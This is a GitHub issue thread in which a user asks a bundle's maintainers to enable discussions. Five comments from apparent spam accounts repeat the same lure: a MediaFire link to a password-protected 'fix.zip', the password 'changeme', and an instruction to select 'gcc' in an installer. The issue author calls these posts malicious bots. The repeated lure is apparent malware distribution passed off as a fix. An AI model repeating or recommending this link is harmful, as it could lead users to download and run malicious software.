### ISSUE TITLE
Enable discussions?

### ISSUE THREAD

**Issue by tacman** [makinacorpus/static-passthrough-bundle#9]
I have some ideas that aren't bug reports, but more about documentation and "how to".  If you enable discussions, I'll kick it off with a "how to" question, specifically how to use this bundle as a cache/proxy.

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tacman** [comment]
Wow, looks like the malicious bots are attacking github.  Argh.

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WaveListenToMe** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by SimonMellerin** [comment]
done
